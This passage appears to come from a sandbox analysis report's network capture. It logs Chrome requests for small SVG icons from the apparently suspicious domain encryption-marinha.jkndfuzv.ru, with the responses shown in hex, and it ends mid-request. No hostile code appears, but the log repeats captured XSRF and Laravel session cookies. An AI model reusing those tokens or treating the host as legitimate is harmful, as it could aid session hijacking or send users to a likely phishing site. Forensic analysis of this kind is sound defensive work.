                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkdseWYxdzJpWGVTMEJydy94MkFEYUE9PSIsInZhbHVlIjoiVDlBTUxyMTdQRGFWdzZhSXNvKzBKUjM5WVFPZ3hER3crN2pEcjFiVUZCL0VSaENmUkxGMEVJNDhQeVAvOVpIS2RRdjRPOVE3OXcraFNBbmluRFA4VWFlZGdZVmhRVW5lelFlQXEzSFQrTjdhSWhmTjhqREQ4OVZmTDNVNlBsRVoiLCJtYWMiOiJkODczY2M4ZGQ1YWE1NjcyNmMxZTFiYmUyYmZhZmY4YTg3ZGM5NjMxZDNlNzQwMTgwYTZmM2Q4ZDQ1MmU1OWUyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImhtQlplWC81bVVjcEVwSHdEN1hDOUE9PSIsInZhbHVlIjoiOFZGZEdmSDh1NDhuYWprQU8zdFJEd3NQU0FyZExXbTBHUnV1UllEUUVIMHFYOEh0MW1VN2ZEV2tjVnU3Q3JKbEpxRkcvMUpmbjFiZndYR1dXanBKMjFIa2lXNlFvUGF5OVRkV2loL1BLOHNHdStpNU9nS3EzdVNhbDVhRUttby8iLCJtYWMiOiIxMzRjZjM5MWYzMGNmMzBiNzJmOGE4MWNhNTJmYWQwN2Q4NDc3M2U0MDMyOTIyZGYyMzM0YmYzYTdhOWVjOTdiIiwidGFnIjoiIn0%3D
                                                                  2025-03-14 11:31:02 UTC1108INHTTP/1.1 200 OK
                                                                  Date: Fri, 14 Mar 2025 11:31:02 GMT
                                                                  Content-Type: image/svg+xml
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Content-Disposition: inline; filename="efAlkLzZXEwNsgINX7w1qxrgFMBnoYa5WVYJijrAmeuDXpDcVRZAjYpFJOZ90150"
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WcVblR5%2FzEoHCBmxz2PB5X3Tz6WlTB3rTenzOVn2I1SiBlEZF7wrywu6HzyIDyABKaXFbIoizc8LaUaLPzRKdBIpWSVABAkqgpejX%2BM68Evk9Oy4Dgf1xCfKl9X6"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=6265&min_rtt=4268&rtt_var=3027&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2382&delivery_rate=667291&cwnd=251&unsent_bytes=0&cid=e2fde357ae2eb5e5&ts=139&x=0"
                                                                  vary: accept-encoding
                                                                  Server: cloudflare
                                                                  CF-RAY: 9203714468e29e17-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1803&min_rtt=1802&rtt_var=679&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2046&delivery_rate=1608815&cwnd=193&unsent_bytes=0&cid=5ac4006fdd0b0fbc&ts=426&x=0"
                                                                  2025-03-14 11:31:02 UTC261INData Raw: 31 30 65 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 20 31 32 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 36 2e 37 2c 36 2c 31 32 2c 31 31 2e 33 30 39 2c 31 31 2e 33 30 39 2c 31 32 2c 36 2c 36 2e 37 2e 36 39 31 2c 31 32 2c 30 2c 31 31 2e 33 30 39 2c 35 2e 33 2c 36 2c 30 2c 2e 36 39 31 2e 36 39 31 2c 30 2c 36 2c 35 2e 33 2c 31 31 2e 33 30 39 2c 30 2c 31 32 2c 2e 36 39 31 5a 22 20 66 69
                                                                  Data Ascii: 10e<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fi
                                                                  2025-03-14 11:31:02 UTC16INData Raw: 36 32 36 32 36 22 2f 3e 3c 2f 73 76 67 3e 0d 0a
                                                                  Data Ascii: 62626"/></svg>
                                                                  2025-03-14 11:31:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  34192.168.2.449763104.21.43.1754435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:31:02 UTC1463OUTGET /ijh3pCKtx2MXEuj3T1idod88SGEmvyzP0ZxllXfeCSfXEG7N78170 HTTP/1.1
                                                                  Host: encryption-marinha.jkndfuzv.ru
                                                                  Connection: keep-alive
                                                                  sec-ch-ua-platform: "Windows"
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  sec-ch-ua-mobile: ?0
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNX
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkdseWYxdzJpWGVTMEJydy94MkFEYUE9PSIsInZhbHVlIjoiVDlBTUxyMTdQRGFWdzZhSXNvKzBKUjM5WVFPZ3hER3crN2pEcjFiVUZCL0VSaENmUkxGMEVJNDhQeVAvOVpIS2RRdjRPOVE3OXcraFNBbmluRFA4VWFlZGdZVmhRVW5lelFlQXEzSFQrTjdhSWhmTjhqREQ4OVZmTDNVNlBsRVoiLCJtYWMiOiJkODczY2M4ZGQ1YWE1NjcyNmMxZTFiYmUyYmZhZmY4YTg3ZGM5NjMxZDNlNzQwMTgwYTZmM2Q4ZDQ1MmU1OWUyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImhtQlplWC81bVVjcEVwSHdEN1hDOUE9PSIsInZhbHVlIjoiOFZGZEdmSDh1NDhuYWprQU8zdFJEd3NQU0FyZExXbTBHUnV1UllEUUVIMHFYOEh0MW1VN2ZEV2tjVnU3Q3JKbEpxRkcvMUpmbjFiZndYR1dXanBKMjFIa2lXNlFvUGF5OVRkV2loL1BLOHNHdStpNU9nS3EzdVNhbDVhRUttby8iLCJtYWMiOiIxMzRjZjM5MWYzMGNmMzBiNzJmOGE4MWNhNTJmYWQwN2Q4NDc3M2U0MDMyOTIyZGYyMzM0YmYzYTdhOWVjOTdiIiwidGFnIjoiIn0%3D
                                                                  2025-03-14 11:31:02 UTC1095INHTTP/1.1 200 OK
                                                                  Date: Fri, 14 Mar 2025 11:31:02 GMT
                                                                  Content-Type: image/svg+xml
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Content-Disposition: inline; filename="ijh3pCKtx2MXEuj3T1idod88SGEmvyzP0ZxllXfeCSfXEG7N78170"
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=grkoySZZxqHQDfrxr00PzubYGtuthFJnkkx75wJ9NUyXOPUrNIPL4WzVERKO4uNK8tPL%2FRhp6iVIGgsN0BaYqTh2itVqpdlYv7eRyIWErYMCMqp9su6uIHgQYLi1"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=5510&min_rtt=5453&rtt_var=1635&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2373&delivery_rate=497467&cwnd=251&unsent_bytes=0&cid=e597e4bc6248306d&ts=136&x=0"
                                                                  vary: accept-encoding
                                                                  Server: cloudflare
                                                                  CF-RAY: 920371447be95e80-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1649&min_rtt=1639&rtt_var=636&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2035&delivery_rate=1692753&cwnd=214&unsent_bytes=0&cid=2188de8a372f1e47&ts=421&x=0"
                                                                  2025-03-14 11:31:02 UTC274INData Raw: 31 36 66 63 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 3c 6d 61 73 6b 20 69 64 3d 22 30 37 62 32 36 30 33 34 2d 35 36 61 33 2d 34 39 64 32 2d 38 66 32 36 2d 63 37 62 38 34 65 62 34 65 65 64 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 66 66 66 22 3e 0d 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 33 2e 39 37 36 32 20 30 43 31 36 2e 38 32 34 34 20 30 20 31 30 2e 39 37 30 37 20 35 2e 32 34 33 32 35 20 31
                                                                  Data Ascii: 16fc<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg"><mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff"><path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 1
                                                                  2025-03-14 11:31:02 UTC1369INData Raw: 31 34 20 31 34 2e 30 36 34 37 20 34 2e 35 20 31 37 2e 32 32 33 33 20 34 2e 35 20 32 30 2e 39 34 31 32 43 34 2e 35 30 30 31 39 20 32 30 2e 39 36 38 20 34 2e 35 30 30 34 31 20 32 30 2e 39 39 34 39 20 34 2e 35 30 30 36 36 20 32 31 2e 30 32 31 38 43 34 2e 35 30 30 32 32 20 32 31 2e 30 35 37 34 20 34 2e 35 20 32 31 2e 30 39 33 20 34 2e 35 20 32 31 2e 31 32 38 37 43 34 2e 35 35 30 32 31 20 32 38 2e 32 36 30 39 20 36 2e 38 30 39 36 37 20 33 39 2e 31 36 30 31 20 31 38 2e 36 30 39 31 20 34 36 2e 34 39 33 32 43 32 31 2e 38 32 32 35 20 34 38 2e 35 30 32 33 20 32 35 2e 38 38 39 36 20 34 38 2e 35 30 32 33 20 32 39 2e 31 35 33 32 20 34 36 2e 34 39 33 32 43 34 31 2e 30 35 33 20 33 39 2e 32 31 30 33 20 34 33 2e 33 31 32 35 20 32 38 2e 33 31 31 31 20 34 33 2e 33 31 32 35
                                                                  Data Ascii: 14 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125
                                                                  2025-03-14 11:31:02 UTC1369INData Raw: 43 34 2e 35 35 30 32 31 20 32 38 2e 32 36 30 39 20 36 2e 38 30 39 36 37 20 33 39 2e 31 36 30 31 20 31 38 2e 36 30 39 31 20 34 36 2e 34 39 33 32 43 32 31 2e 38 32 32 35 20 34 38 2e 35 30 32 33 20 32 35 2e 38 38 39 36 20 34 38 2e 35 30 32 33 20 32 39 2e 31 35 33 32 20 34 36 2e 34 39 33 32 43 34 31 2e 30 35 33 20 33 39 2e 32 31 30 33 20 34 33 2e 33 31 32 35 20 32 38 2e 33 31 31 31 20 34 33 2e 33 31 32 35 20 32 31 2e 31 32 38 37 43 34 33 2e 33 31 32 35 20 32 31 2e 31 30 38 20 34 33 2e 33 31 32 34 20 32 31 2e 30 38 37 32 20 34 33 2e 33 31 32 33 20 32 31 2e 30 36 36 35 43 34 33 2e 33 31 32 34 20 32 31 2e 30 32 34 36 20 34 33 2e 33 31 32 35 20 32 30 2e 39 38 32 39 20 34 33 2e 33 31 32 35 20 32 30 2e 39 34 31 32 43 34 33 2e 33 31 32 35 20 31 37 2e 33 33 37 31 20
                                                                  Data Ascii: C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371
                                                                  2025-03-14 11:31:02 UTC1369INData Raw: 32 5a 4d 32 39 2e 31 35 33 32 20 34 36 2e 34 39 33 32 4c 32 37 2e 30 36 35 32 20 34 33 2e 30 38 31 34 4c 32 37 2e 30 35 36 33 20 34 33 2e 30 38 36 39 4c 32 39 2e 31 35 33 32 20 34 36 2e 34 39 33 32 5a 4d 34 33 2e 33 31 32 33 20 32 31 2e 30 36 36 35 4c 33 39 2e 33 31 32 33 20 32 31 2e 30 35 31 39 4c 33 39 2e 33 31 32 32 20 32 31 2e 30 37 33 39 4c 33 39 2e 33 31 32 34 20 32 31 2e 30 39 36 4c 34 33 2e 33 31 32 33 20 32 31 2e 30 36 36 35 5a 4d 33 37 2e 36 37 30 32 20 31 33 2e 30 36 31 38 4c 33 33 2e 36 38 32 34 20 31 33 2e 33 37 33 38 4c 33 33 2e 38 38 38 20 31 36 2e 30 30 31 36 4c 33 36 2e 33 38 33 38 20 31 36 2e 38 34 39 33 4c 33 37 2e 36 37 30 32 20 31 33 2e 30 36 31 38 5a 4d 31 32 2e 32 33 35 34 20 33 38 2e 34 36 39 34 4c 38 2e 36 30 36 36 20 33 36 2e 37
                                                                  Data Ascii: 2ZM29.1532 46.4932L27.0652 43.0814L27.0563 43.0869L29.1532 46.4932ZM43.3123 21.0665L39.3123 21.0519L39.3122 21.0739L39.3124 21.096L43.3123 21.0665ZM37.6702 13.0618L33.6824 13.3738L33.888 16.0016L36.3838 16.8493L37.6702 13.0618ZM12.2354 38.4694L8.6066 36.7
                                                                  2025-03-14 11:31:02 UTC1369INData Raw: 2e 35 30 30 39 36 37 20 32 30 2e 39 37 32 34 43 30 2e 35 30 30 33 32 33 20 32 31 2e 30 32 34 34 20 30 2e 35 20 32 31 2e 30 37 36 35 20 30 2e 35 20 32 31 2e 31 32 38 37 48 38 2e 35 5a 4d 32 30 2e 37 32 30 35 20 34 33 2e 30 39 35 38 43 31 30 2e 35 30 30 35 20 33 36 2e 37 34 34 33 20 38 2e 35 34 34 34 36 20 32 37 2e 34 33 30 32 20 38 2e 34 39 39 39 20 32 31 2e 31 30 30 36 4c 30 2e 35 30 30 30 39 39 20 32 31 2e 31 35 36 39 43 30 2e 35 35 35 39 35 39 20 32 39 2e 30 39 31 36 20 33 2e 31 31 38 38 37 20 34 31 2e 35 37 35 39 20 31 36 2e 34 39 37 37 20 34 39 2e 38 39 30 36 4c 32 30 2e 37 32 30 35 20 34 33 2e 30 39 35 38 5a 4d 32 37 2e 30 35 36 33 20 34 33 2e 30 38 36 39 43 32 35 2e 30 36 38 34 20 34 34 2e 33 31 30 36 20 32 32 2e 36 33 35 38 20 34 34 2e 32 39 33 33
                                                                  Data Ascii: .500967 20.9724C0.500323 21.0244 0.5 21.0765 0.5 21.1287H8.5ZM20.7205 43.0958C10.5005 36.7443 8.54446 27.4302 8.4999 21.1006L0.500099 21.1569C0.555959 29.0916 3.11887 41.5759 16.4977 49.8906L20.7205 43.0958ZM27.0563 43.0869C25.0684 44.3106 22.6358 44.2933
                                                                  2025-03-14 11:31:02 UTC142INData Raw: 39 35 38 32 20 33 39 2e 37 32 34 36 20 32 36 2e 30 38 36 34 20 34 31 2e 34 38 32 32 4c 33 30 2e 32 36 32 35 20 34 38 2e 33 30 35 37 5a 4d 33 30 2e 32 36 30 37 20 34 38 2e 33 30 36 38 4c 33 30 2e 32 36 32 38 20 34 38 2e 33 30 35 35 4c 32 36 2e 30 38 36 31 20 34 31 2e 34 38 32 34 4c 32 36 2e 30 38 34 20 34 31 2e 34 38 33 36 4c 33 30 2e 32 36 30 37 20 34 38 2e 33 30 36 38 5a 4d 33 30 2e 32 36 36 20 34 38 2e 33 30 33 35 0d 0a
                                                                  Data Ascii: 9582 39.7246 26.0864 41.4822L30.2625 48.3057ZM30.2607 48.3068L30.2628 48.3055L26.0861 41.4824L26.084 41.4836L30.2607 48.3068ZM30.266 48.3035
                                                                  2025-03-14 11:31:02 UTC1369INData Raw: 35 65 32 0d 0a 4c 33 30 2e 32 36 38 31 20 34 38 2e 33 30 32 33 4c 32 36 2e 30 37 36 37 20 34 31 2e 34 38 38 31 4c 32 36 2e 30 37 34 36 20 34 31 2e 34 38 39 34 4c 33 30 2e 32 36 36 20 34 38 2e 33 30 33 35 5a 4d 31 37 2e 34 38 32 36 20 34 38 2e 32 39 35 43 32 31 2e 33 38 39 39 20 35 30 2e 37 33 37 39 20 32 36 2e 33 32 35 32 20 35 30 2e 37 32 39 34 20 33 30 2e 32 36 37 32 20 34 38 2e 33 30 32 38 4c 32 36 2e 30 37 33 34 20 34 31 2e 34 39 30 32 43 32 34 2e 36 38 34 31 20 34 32 2e 33 34 35 34 20 32 33 2e 30 31 37 35 20 34 32 2e 33 32 30 37 20 32 31 2e 37 32 33 36 20 34 31 2e 35 31 31 37 4c 31 37 2e 34 38 32 36 20 34 38 2e 32 39 35 5a 4d 31 37 2e 34 37 38 39 20 34 38 2e 32 39 32 37 4c 31 37 2e 34 38 31 20 34 38 2e 32 39 34 31 4c 32 31 2e 37 32 35 31 20 34 31 2e
                                                                  Data Ascii: 5e2L30.2681 48.3023L26.0767 41.4881L26.0746 41.4894L30.266 48.3035ZM17.4826 48.295C21.3899 50.7379 26.3252 50.7294 30.2672 48.3028L26.0734 41.4902C24.6841 42.3454 23.0175 42.3207 21.7236 41.5117L17.4826 48.295ZM17.4789 48.2927L17.481 48.2941L21.7251 41.
                                                                  2025-03-14 11:31:02 UTC144INData Raw: 31 39 2e 38 32 39 36 43 32 35 2e 34 38 36 32 20 31 39 2e 38 32 39 36 20 32 36 2e 36 31 38 38 20 32 30 2e 39 36 32 32 20 32 36 2e 36 31 38 38 20 32 32 2e 33 35 39 33 48 33 34 2e 36 31 38 38 5a 22 20 66 69 6c 6c 3d 22 23 30 30 30 30 30 30 22 20 6d 61 73 6b 3d 22 75 72 6c 28 23 30 37 62 32 36 30 33 34 2d 35 36 61 33 2d 34 39 64 32 2d 38 66 32 36 2d 63 37 62 38 34 65 62 34 65 65 64 34 29 22 2f 3e 0d 0a 3c 2f 73 76 67 3e 0d 0a 0d 0a
                                                                  Data Ascii: 19.8296C25.4862 19.8296 26.6188 20.9622 26.6188 22.3593H34.6188Z" fill="#000000" mask="url(#07b26034-56a3-49d2-8f26-c7b84eb4eed4)"/></svg>
                                                                  2025-03-14 11:31:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  35192.168.2.449759104.21.43.1754435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:31:02 UTC1470OUTGET /yzDhxxcm7mbe0biUXnf7h5BSC0wgalccVUxATWopC0JTt9qZL8buLnc90180 HTTP/1.1
                                                                  Host: encryption-marinha.jkndfuzv.ru
                                                                  Connection: keep-alive
                                                                  sec-ch-ua-platform: "Windows"
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  sec-ch-ua-mobile: ?0
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNX
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkdseWYxdzJpWGVTMEJydy94MkFEYUE9PSIsInZhbHVlIjoiVDlBTUxyMTdQRGFWdzZhSXNvKzBKUjM5WVFPZ3hER3crN2pEcjFiVUZCL0VSaENmUkxGMEVJNDhQeVAvOVpIS2RRdjRPOVE3OXcraFNBbmluRFA4VWFlZGdZVmhRVW5lelFlQXEzSFQrTjdhSWhmTjhqREQ4OVZmTDNVNlBsRVoiLCJtYWMiOiJkODczY2M4ZGQ1YWE1NjcyNmMxZTFiYmUyYmZhZmY4YTg3ZGM5NjMxZDNlNzQwMTgwYTZmM2Q4ZDQ1MmU1OWUyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImhtQlplWC81bVVjcEVwSHdEN1hDOUE9PSIsInZhbHVlIjoiOFZGZEdmSDh1NDhuYWprQU8zdFJEd3NQU0FyZExXbTBHUnV1UllEUUVIMHFYOEh0MW1VN2ZEV2tjVnU3Q3JKbEpxRkcvMUpmbjFiZndYR1dXanBKMjFIa2lXNlFvUGF5OVRkV2loL1BLOHNHdStpNU9nS3EzdVNhbDVhRUttby8iLCJtYWMiOiIxMzRjZjM5MWYzMGNmMzBiNzJmOGE4MWNhNTJmYWQwN2Q4NDc3M2U0MDMyOTIyZGYyMzM0YmYzYTdhOWVjOTdiIiwidGFnIjoiIn0%3D
                                                                  2025-03-14 11:31:02 UTC1110INHTTP/1.1 200 OK
                                                                  Date: Fri, 14 Mar 2025 11:31:02 GMT
                                                                  Content-Type: image/svg+xml
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Content-Disposition: inline; filename="yzDhxxcm7mbe0biUXnf7h5BSC0wgalccVUxATWopC0JTt9qZL8buLnc90180"
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L3ZsLz%2F18TCqc6VlBIP8JO8mNnfqjrlk2WJdFKOQJVCm2azBn%2FNS4cns%2BRNT2QOT2VsbI6Kt9bgrnHAKfticw%2BnI2LbfMPxo6khV9%2BrydLQmPOx8ZMi0K9RFMmvr"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=5452&min_rtt=5451&rtt_var=2047&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2379&delivery_rate=521134&cwnd=250&unsent_bytes=0&cid=e103890b3d59ec2c&ts=110&x=0"
                                                                  vary: accept-encoding
                                                                  Server: cloudflare
                                                                  CF-RAY: 920371447e9a8c05-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1786&min_rtt=1780&rtt_var=681&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2042&delivery_rate=1591280&cwnd=205&unsent_bytes=0&cid=630bbb025aca23d4&ts=397&x=0"
                                                                  2025-03-14 11:31:02 UTC259INData Raw: 62 35 39 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 30 2e 34 32 32 2c 32 39 2e 30 39 32 61 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2e 32 36 31 2c 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2c 31 2e 31 33 32 2e 37 34 39 71 2e 33 36 36 2e 33 36 36 2e 38 32 37 2e 37 37 35 74 2e 39 34 39 2e 38 35
                                                                  Data Ascii: b59<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.85
                                                                  2025-03-14 11:31:02 UTC1369INData Raw: 38 38 2e 34 34 34 2e 39 34 31 2e 39 33 32 61 39 2e 39 37 34 2c 39 2e 39 37 34 2c 30 2c 30 2c 31 2c 2e 38 31 39 2c 31 41 34 2e 39 35 31 2c 34 2e 39 35 31 2c 30 2c 30 2c 31 2c 33 37 2c 33 34 2e 37 33 36 61 33 2e 31 33 33 2c 33 2e 31 33 33 2c 30 2c 30 2c 31 2c 2e 32 31 38 2c 31 2e 31 35 2c 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2d 2e 32 36 31 2c 31 2e 33 32 34 2c 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2d 2e 37 34 39 2c 31 2e 31 33 32 71 2d 2e 38 38 38 2e 38 38 38 2d 31 2e 36 2c 31 2e 35 36 38 61 38 2e 37 35 33 2c 38 2e 37 35 33 2c 30 2c 30 2c 31 2d 31 2e 34 38 39 2c 31 2e 31 35 2c 36 2e 31 37 2c 36 2e 31 37 2c 30 2c 30 2c 31 2d 31 2e 37 31 36 2e 37 30 35 41 39 2e 33 36 37 2c 39 2e 33 36 37 2c 30 2c 30 2c 31 2c 32 39 2e 31 35 31 2c 34
                                                                  Data Ascii: 88.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,4
                                                                  2025-03-14 11:31:02 UTC1284INData Raw: 38 34 2c 37 2e 31 35 33 2c 37 2e 31 35 33 2c 30 2c 30 2c 30 2c 31 2e 31 32 34 2d 2e 39 34 31 71 2e 35 34 39 2d 2e 35 35 37 2c 31 2e 32 36 33 2d 31 2e 32 37 32 61 31 2e 31 38 39 2c 31 2e 31 38 39 2c 30 2c 30 2c 30 2c 2e 33 36 36 2d 2e 38 37 31 2c 31 2e 33 38 32 2c 31 2e 33 38 32 2c 30 2c 30 2c 30 2d 2e 32 37 39 2d 2e 36 35 33 41 31 30 2e 34 2c 31 30 2e 34 2c 30 2c 30 2c 30 2c 33 34 2c 33 34 2e 33 30 39 61 31 34 2e 30 36 2c 31 34 2e 30 36 2c 30 2c 30 2c 30 2d 2e 39 35 38 2d 31 2e 30 33 36 71 2d 2e 35 33 31 2d 2e 35 32 33 2d 31 2e 30 33 36 2d 2e 39 35 38 61 38 2e 39 35 2c 38 2e 39 35 2c 30 2c 30 2c 30 2d 2e 39 33 32 2d 2e 37 31 34 2c 31 2e 33 38 32 2c 31 2e 33 38 32 2c 30 2c 30 2c 30 2d 2e 36 35 33 2d 2e 32 37 39 2c 31 2e 32 31 34 2c 31 2e 32 31 34 2c 30 2c
                                                                  Data Ascii: 84,7.153,7.153,0,0,0,1.124-.941q.549-.557,1.263-1.272a1.189,1.189,0,0,0,.366-.871,1.382,1.382,0,0,0-.279-.653A10.4,10.4,0,0,0,34,34.309a14.06,14.06,0,0,0-.958-1.036q-.531-.523-1.036-.958a8.95,8.95,0,0,0-.932-.714,1.382,1.382,0,0,0-.653-.279,1.214,1.214,0,
                                                                  2025-03-14 11:31:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  36192.168.2.449764104.21.43.1754435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:31:03 UTC1468OUTGET /rsvIvTvoLMZ03pS3MwX9LijbSo1tmpSLY8DjCu6chApJIUMh9R9qpcd198 HTTP/1.1
